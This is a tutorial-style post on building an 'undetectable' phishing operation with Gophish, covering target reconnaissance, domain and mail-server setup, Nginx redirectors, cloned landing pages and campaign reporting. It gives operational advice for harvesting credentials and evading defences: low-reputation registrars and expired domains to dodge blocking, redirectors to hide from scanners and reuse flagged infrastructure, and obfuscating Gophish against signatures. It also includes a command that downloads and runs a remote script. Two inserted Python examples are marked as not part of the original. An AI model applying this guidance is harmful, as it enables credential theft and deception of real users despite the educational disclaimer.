Undetectable Phishing setup

Phishing is an Art.

I'd like to share my experience and methodologies for phishing targeted users, which involves using a variety of tools and scripts. The goal of this activity is typically to harvest credentials or gain initial access to a user's computer. Therefore, it's important to have a well-planned phishing setup in order to increase the chances of success.

However, it's worth noting that phishing is an illegal activity and should not be engaged in. With that said, let's begin discussing the topic.

Sharing knowledge for educational purposes. Please use it wisely.

Pre-setup

It's a good idea to check for misconfigurations in the targeted domains before starting a phishing setup. These misconfigurations can be exploited to facilitate phishing activity.

For example, if the domain has insecure redirects or weak password policies, it may be easier to successfully carry out a phishing attack. It's important to be thorough in your assessment of the target's vulnerabilities, as this can increase the chances of a successful phishing attempt.

Domain SPF Validation:

To check if a domain is vulnerable to spoofing attacks, you can check its SPF (Sender Policy Framework) record. SPF is a security standard that helps to prevent email spoofing by specifying which mail servers are authorized to send email on behalf of a domain. To check a domain's SPF record, you can use a tool such as MXToolbox's SPF Record Lookup.

Here's how to use it:

  1. Go to the MXToolbox website (https://mxtoolbox.com/)

  2. In the search bar, enter "SPF Record Lookup" and press enter

  3. In the text field, enter the domain that you want to check

  4. Click the "SPF Record Lookup" button

The tool will then retrieve the domain's SPF record and display it for you. If the record includes a "v=spf1 -all" directive, it means that the domain is protected against spoofing attacks. If the record is blank or includes a "v=spf1 ?all" directive, it means that the domain is not protected against spoofing attacks and may be vulnerable to spoofing.

Verify the SPF record manually: a "~all" (softfail) qualifier means the domain is vulnerable to domain spoofing.

root@MonsterSec:~# dig +short domain-namexxxx.com txt
"v=spf1 ip4:3x.7x.15x.196 include:_spf.goxxx.com ~all"
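As an added example (not part of the original post), the Python below applies the same classification as the check above, so a defender can audit the SPF posture of their own domains: it parses the record, reads the qualifier on the terminal "all" mechanism, and flags anything other than "-all" as spoofable. The function names, the optional dig wrapper and the redirect= handling are assumptions; the sample record is the one quoted from the dig output above.

```python
"""Classify the anti-spoofing posture an SPF TXT record gives a domain."""
import re
import shutil
import subprocess

# Meaning of the qualifier on the terminal "all" mechanism (RFC 7208).
ALL_QUALIFIERS = {
    "-": "fail: mail from unlisted hosts should be rejected",
    "~": "softfail: mail from unlisted hosts is accepted but marked",
    "?": "neutral: no statement is made about unlisted hosts",
    "+": "pass: any host may send as this domain",
}

def parse_spf(record):
    """Return the record's mechanisms and the qualifier of its 'all' term (None if absent)."""
    terms = record.strip().strip('"').split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record: %r" % record)
    all_qualifier = None
    for term in terms[1:]:
        match = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
        if match:
            all_qualifier = match.group(1) or "+"  # a bare "all" means "+all"
            break  # nothing after a matching 'all' is evaluated
    return {"mechanisms": terms[1:], "all": all_qualifier}

def spf_posture(record):
    """Map a record (possibly empty) to (posture, reason): protected, spoofable, delegated or missing."""
    if not record or not record.strip():
        return "missing", "no SPF record published, so receivers have nothing to check against"
    parsed = parse_spf(record)
    qualifier = parsed["all"]
    if qualifier is None:
        if any(t.lower().startswith("redirect=") for t in parsed["mechanisms"]):
            return "delegated", "policy comes from the redirect= target; check that domain instead"
        return "spoofable", "no terminal 'all' mechanism, which evaluates as neutral"
    if qualifier == "-":
        return "protected", ALL_QUALIFIERS["-"]
    return "spoofable", ALL_QUALIFIERS[qualifier]

def lookup_spf(domain):
    """Fetch the SPF record with the same dig query as above (needs dig and network access)."""
    if shutil.which("dig") is None:
        raise RuntimeError("dig is not installed")
    out = subprocess.run(["dig", "+short", domain, "txt"], capture_output=True, text=True, check=True)
    return next((l for l in out.stdout.splitlines() if l.strip('"').lower().startswith("v=spf1")), "")

# The record quoted in the dig output above; the x's are the author's redactions.
SAMPLE_RECORD = '"v=spf1 ip4:3x.7x.15x.196 include:_spf.goxxx.com ~all"'

if __name__ == "__main__":
    print(spf_posture(SAMPLE_RECORD))  # ('spoofable', 'softfail: mail from unlisted hosts is accepted but marked')
```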

Reference:

https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability

Gathering subdomain list

Gathering a list of subdomains can be helpful in finding a suitable subdomain name to host your phishing page. There are several tools, such as Sublist3r, Subfinder, and Findomain, that can assist with subdomain enumeration. These tools can help you find subdomains that are related to your target organization, which can make your phishing attempt more convincing.

Domain purchase:

When purchasing a domain for a phishing campaign, it's important to consider the reputation of the domain provider. Domain providers with a high reputation may have security policies in place to block domains that are used for phishing. Using a domain provider with a lower reputation can help you avoid these security measures.

It's also important to be cautious when selecting a domain name.

  • Using a typo or misspelled version of the target organization's name may not be effective if the organization is monitoring for such domains. Instead, you might consider using a generic name that is related to your phishing goal, such as "email.domain.com" for targeting email credentials.

  • Using an expired domain name can also help you bypass email reputation checks.

Infrastructure setup:

1. Email server

There are several options for setting up an email server for a phishing campaign:

  1. Self-hosted email server: You can use a self-hosted email server such as Postfix or Axigen to send phishing emails. Automated setup scripts, such as Emailwiz, can also automate the process of setting up an email server for phishing.

  2. Managed email server: You can use a managed email service such as Office365 or Google Workspace to send phishing emails. To use Google Workspace, you will need to add TXT and MX records to your target domain and possibly create additional users. There are also tools available, such as GAM, that can automate certain tasks within Google Workspace.

  3. Third-party email server: You can use a third-party email service such as Gmail or Outlook to send phishing emails. However, these services may have stricter security measures in place, making it more difficult to successfully carry out a phishing attack.

2. Managed DNS Provider

Instead of hosting your DNS records on your own server, you can use a third-party DNS provider to propagate your records more quickly. This can be particularly useful when conducting multiple phishing campaigns, as you can manage multiple DNS providers from a single platform. Some popular DNS providers include Cloudns and Cloudflare.

It's a good idea to check your hosting service provider's propagation capability before moving to a third-party DNS provider.

Propagation refers to the process of updating DNS records on servers around the world, and it can take some time for these updates to take effect.

If your hosting service provider has a slow propagation rate, it may take longer for your DNS records to be updated and for your phishing campaign to be effective.

3. Redirector

Using a redirector in a phishing campaign can serve several purposes:

  1. Masking the phishing setup from public scanners: A redirector can help to conceal the location of your phishing setup, making it more difficult for public scanners to detect and track.

  2. Routing traffic from unwanted sources: A redirector can be used to filter traffic from sources such as unwanted internet scanners or vulnerability checker scripts, helping to reduce the risk of detection.

  3. Reusing a setup once it has been marked as malicious: If a redirector IP or domain has been marked as malicious or suspicious by security protection software or services, it can still be used in a phishing campaign by routing traffic through a different, less suspicious domain or IP.

Redirector setup

To set up a server for a phishing campaign using Gophish, you will need to install and configure certain components, such as Nginx and Certbot.

Nginx is a web server that can be used to host your phishing pages. To install Nginx, you will need to follow the installation instructions specific to your operating system.

Certbot is a tool that can be used to automatically obtain SSL certificates for your phishing domains. This can help to make your phishing pages more convincing, as SSL certificates add an extra layer of security and trust. To install Certbot, you will need to follow the instructions for your operating system. Once Certbot is installed, you can use it to register an SSL certificate for your phishing domain. You will need to use a subdomain to register the certificate, and then update the server IP address as an A DNS record on the domain hosting.

Gist Script:

sudo apt update
sudo apt install nginx
sudo snap install core; sudo snap refresh core
sudo snap install --classic certbot
sudo ln -s /snap/bin/certbot /usr/bin/certbot
sudo certbot --nginx
root@localhost:/var/log/letsencrypt# service nginx start
root@localhost:/var/log/letsencrypt# sudo certbot --nginx

**Automation Script:**
bash <(wget -qO- https://gist.githubusercontent.com/Monst3rSec/9bb457ee1902a99fa6d2d5e000882863/raw/0513fd3b175f6c796fb30c6f5bd35f23969322da/nginx-redirector-phishing.sh )

To configure Nginx for a phishing campaign, you will need to modify the Nginx config file in the "sites-available" folder. The specific changes that you will need to make will depend on the phishing scenario that you are planning. For example, you may need to set up redirects or specify the location of your phishing pages.

Scenario 1

Scenario 2

If the target webpage is not rendering properly in the Gophish landing page, it could be due to issues with the CSS properties or the way the webpage was deployed on the Gophish server. In this case, you may need to use another server to host the webpage. This can help to ensure that the webpage is displayed correctly to the target.

If you are using a separate server to host the phishing webpage, you will need to modify the Nginx config file to reflect this change. You will need to specify the location of the webpage on the new server and set up any necessary redirects or proxy configurations.

In a phishing campaign, the C2 (command and control) server and payload server can be integrated with Gophish by modifying the Nginx config file to specify different location paths. This can allow you to manage the C2 and payload servers separately from the main Gophish server.

Quick Tips
  • Nginx mirror request - https://alex.dzyoba.com/blog/nginx-mirror/

    • Nginx mirror duplicates every request and updates the campaign status in the Gophish dashboard as soon as the page is visited. Without it, the status is only updated once credentials have been harvested.

    • The track location endpoint is used to update the status of the campaign in Gophish.

  • The form action should point to the redirector server.

    • <form name="form1" method="post" action="https://157.245.104.196/" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">

    • <form id="fm1" class="fm-v clearfix" action="" method="post">

Gophish Integration

To integrate Gophish with your phishing campaign, you will need to access the Gophish server using https://127.0.0.1:3333. Gophish requires the use of https, so you will need to ensure that it is enabled on your server.

To log in to Gophish, you will need to use the admin username and the generated password. After logging in, it is recommended to change the password to improve security. You can use SSH tunneling to simplify the process of accessing the Gophish server.

It's important to note that many cloud providers have tightened their firewall and spam protection measures in recent years. Therefore, it's a good idea to check which ports are allowed to connect to your server and to ensure that you have all the necessary permissions.

There are also other parameters that can impact the delivery of phishing emails, such as the sender's reputation and the email's content. It's important to carefully consider these factors in order to increase the chances of a successful phishing campaign.

Reference: https://linuxize.com/post/how-to-setup-ssh-tunneling/

To simplify the process, use the below automation script.

A. Sending profile

Gophish and email integration:

There are several ways to integrate an email server with Gophish for a phishing campaign:

  1. Gmail Workspace <-> Gophish: You can use Google Workspace (formerly known as G Suite) as your email server and Gophish to manage your phishing campaign.

  2. Office365 <-> Gophish: You can use Office365 as your email server and Gophish to manage your phishing campaign.

  3. Gmail or Outlook <-> Gophish: You can use a consumer email service such as Gmail or Outlook as your email server and Gophish to manage your phishing campaign.

To integrate Gmail or Google Workspace with Gophish, you may need to remove certain security restrictions. For example, you may need to enable the use of "less secure apps" in your Google account settings. It's important to be aware that this can increase the risk of your account being compromised.

If you encounter authentication errors when attempting to integrate your email server with Gophish, it may be necessary to check your authentication details.

If emails are not being sent, it could be because the email port is not working properly. This can sometimes be due to restrictions imposed by cloud providers. When integrating an email server with Gophish for a phishing campaign, it's important to remember that the "less secure apps" privilege may need to be enabled for each user. This can allow Gophish to access the user's email account for the purpose of sending phishing emails.

B. Landing page

  • To create a phishing campaign with Gophish, you can try cloning the targeted landing page using the import option and setting up a redirect URL on the same form.

  • If you are unable to clone the page directly, you can try downloading the page using the "save as" option in your browser and then editing it to match the target page. Once you have created the landing page, you will need to place it on the landing page server.

C. Email templates

  • There are a number of tools and techniques you can use to create email templates for a phishing campaign.

  • One option is to use a tool like Word to HTML, which can help you convert a Word document into an HTML email template. You can then modify the HTML content using a text editor like Notepad.

  • It's important to be aware that the font and font size may differ when you copy the content from Word to HTML, so you may need to make some adjustments.

D. Users and groups

  • To upload a list of users into Gophish for a phishing campaign, you will need to download a CSV (Comma Separated Values) file and then import it into Gophish. The CSV file should contain the email addresses of the users that you want to target.

E. Campaigns

  • If you have multiple campaigns in Gophish that contain duplicate entries, you may want to try eliminating the duplicates to avoid confusion and improve efficiency. Here are a few tips for doing so:

    1. Use a deduplication tool: There are several deduplication tools available that can help you identify and remove duplicates from a list.

    2. Manually review the list: If you don't have access to a deduplication tool, you can try manually reviewing the list and removing duplicates manually.

    3. Check for variations in spelling or formatting: Duplicates can sometimes be difficult to identify if the entries are spelled or formatted differently. Make sure to check for variations in spelling and formatting when reviewing the list.

F. Email Reporting

Email reporting can be a useful way for customers to track the performance of their phishing campaigns. Depending on the specific requirements of the customer, the report may include information such as:

  1. Number of emails sent: The total number of emails that were sent as part of the campaign.

  2. Number of emails opened: The number of emails that were opened by the recipients.

  3. Number of clicks: The number of times that a link in the email was clicked by a recipient.

  4. Conversion rate: The percentage of recipients who took a desired action (such as entering their login credentials) after receiving the email.

  5. Geographical distribution: A breakdown of the locations where the emails were opened and clicked.

Automation Tool Tips:

Gophish Defense Evasion

Gophish is a tool that is often used for phishing campaigns. However, it is possible for security teams to detect and prevent these campaigns by creating their own signatures to identify Gophish operations.

To avoid detection, some phishers may use obfuscation techniques to create a unique version of Gophish. This can make it more difficult for security teams to identify and block phishing campaigns.

Reference:

https://www.sprocketsecurity.com/resources/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls

GoReport - Gophish Reporting Tool

https://github.com/chrismaddalena/Goreport

This script accepts your Gophish campaign ID(s) as a parameter and then collects the campaign results to present the statistics and perform user-agent parsing and geolocation lookups for IP addresses. Goreport generates lists of IP addresses, operating systems, browser types and versions, and locations with counts for the number of times each one was seen throughout the campaign.

Goreport will report the total number of events and the number of email recipients that participated in each event. In other words, Goreport will show how many times Gophish recorded a "Clicked Link" event and how many recipients clicked a link. These are very different numbers. A campaign sent to 10 people could have 9 Clicked Link events when only 3 recipients clicked a link. Knowing that recipients clicked a link or submitted data more than once is valuable information, but make sure you keep the numbers straight. Credit: @cmaddalena
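An added example, not part of the original post or of GoReport's own code, showing the distinction above between the number of events and the number of recipients, together with the metrics listed under "Email Reporting" (sent, opened, clicked, conversion rate) and a coarse browser breakdown from user-agent strings. The event timeline, user-agent strings and function names are constructed for this illustration.

```python
"""Campaign statistics that keep event counts and recipient counts apart."""
from collections import Counter, defaultdict

# Event messages as they appear in Gophish campaign results.
EVENT_ORDER = ["Email Sent", "Email Opened", "Clicked Link", "Submitted Data"]

# Constructed sample timeline, not real campaign data: (recipient, event, user-agent).
USERS = ["user%d@example.test" % i for i in range(1, 6)]
U1, U2, U3 = USERS[:3]
CHROME = "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 Chrome/120.0 Safari/537.36"
FIREFOX = "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
EDGE = CHROME + " Edg/120.0"
SAMPLE_EVENTS = (
    [(u, "Email Sent", "") for u in USERS]
    + [(U1, "Email Opened", ""), (U1, "Email Opened", ""), (U2, "Email Opened", ""), (U3, "Email Opened", "")]
    + [(U1, "Clicked Link", CHROME)] * 3 + [(U2, "Clicked Link", FIREFOX)]
    + [(U3, "Clicked Link", EDGE)] * 2 + [(U3, "Submitted Data", EDGE)] * 2
)

def browser_family(user_agent):
    """Coarse user-agent parsing. Order matters: Edge UAs also contain 'Chrome' and 'Safari'."""
    for token, name in (("Edg/", "Edge"), ("Firefox/", "Firefox"), ("Chrome/", "Chrome"), ("Safari/", "Safari")):
        if token in user_agent:
            return name
    return "Other"

def summarise(events):
    """Per event type: how many times it was recorded vs how many distinct recipients triggered it."""
    totals, recipients, browsers = Counter(), defaultdict(set), Counter()
    for recipient, message, user_agent in events:
        totals[message] += 1
        recipients[message].add(recipient)
        if user_agent:  # only click/submit events carry a user-agent
            browsers[browser_family(user_agent)] += 1
    summary = {m: {"events": totals[m], "recipients": len(recipients[m])} for m in EVENT_ORDER}
    summary["browsers"] = dict(browsers)
    return summary

def conversion_rate(summary):
    """Recipients who submitted data at least once, as a fraction of recipients emailed."""
    sent = summary["Email Sent"]["recipients"]
    return summary["Submitted Data"]["recipients"] / sent if sent else 0.0

if __name__ == "__main__":
    s = summarise(SAMPLE_EVENTS)
    for m in EVENT_ORDER:
        print("%-15s events=%2d recipients=%d" % (m, s[m]["events"], s[m]["recipients"]))
    print("browsers:", s["browsers"], "conversion rate:", conversion_rate(s))
```

On the sample timeline, "Clicked Link" shows 6 events but only 3 recipients, which is the gap the paragraph above warns about.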

Initial Access - Code Execution

It's highly recommended to check the below document for the various initial access methods.

Note

Starting in the middle of 2022, Microsoft Office will block macros from the internet by default in an effort to improve security and prevent attacks. This means that macros that are downloaded from the internet will be blocked from running by default.

It is still possible to enable macros on a case-by-case basis, but this requires user intervention and can help to prevent malicious macros from running without the user's knowledge. It's important for users to be cautious when enabling macros, especially if they are downloaded from the internet.

Conclusion

The above information describes a basic phishing setup using Gophish. However, it is possible to add more sophisticated capabilities to make the campaign more stealthy. For example, you could use cloud services such as Azure and AWS to host the phishing pages and servers.

It's important to note that phishing is a constantly evolving threat, and it's important to keep learning about new methodologies and techniques in order to be able to effectively target different environments.

Thanks for reading.
